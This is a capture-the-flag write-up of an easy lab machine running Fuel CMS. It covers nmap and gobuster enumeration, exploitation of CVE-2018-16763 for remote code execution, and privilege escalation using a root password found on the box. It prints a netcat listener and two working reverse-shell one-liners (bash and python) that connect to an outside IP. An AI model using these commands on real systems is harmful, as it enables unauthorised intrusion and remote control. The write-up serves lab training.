Description: A new start-up has a few issues with their web server.
Free room , Difficulty: Easy
>:sudo nmap -sC -sV 'machine-ip'
This is the scan method I use most of the time. With
-sC it loads some standard nmap scripts and with
-sV it shows the version of every service located at the open ports. My results were:
Open port is 80 HTTP. The website itself contains a content management system (CMS) named fuel.
To further enumerate the machine I want to scan it for any, maybe some hidden, directories. For this I’m using GoBuster with the machine IP address and the wordlist with commonly used directory names:
>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt
A lot of directories! Went through all of there and one useful result was “/fuel” as we saw in the nikto scan result above and it turns out to be a login page.
Because CMS tend to have a lot of weak points so let’s have a look, if there is an exploit for Fuel CMS on “exploit-db”.
One result with the number CVE-2018-16763 we’re able to use a Remote Code Execution against the CMS. I downloaded it and entered my own IP address. Then I marked it as executable and executed it. My output contained errors and mostly because of the proxy. To make the exploit work I had to comment out the proxy entries otherwise to get rid of the errors. Now the exploit script should look like this
Entering the command
whoami then got me the output www-data.
Down are still some errors but we got our desired output on the top.
Because I am now able to execute commands I entered the code for a reverse shell. But to catch any output we have to set up a netcat listener:
>:nc -lnvp 443
Now we can enter our reverse shell code(bash or python choose what ya like) .
>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And then stabilized my current shell with:
>:python -c 'import pty; pty.spawn("/bin/bash")'
Note: I found out, that using the su command later on needs a terminal. So stabilizing the shell is very important to get to the solution.
cat the “user.txt” file (*1). Searched for backups because those tend to contain valuable informations:
>:find / -type f -name "*.bak" 2>/dev/null
2>/dev/null at the end I get rid of all the files I don’t have the permissions for it.
After looking around , I found the password for root:
Okay so we just found the password for the root user and now we can change our account user to
After this you can just get the root flag from
Author : Puckiestyle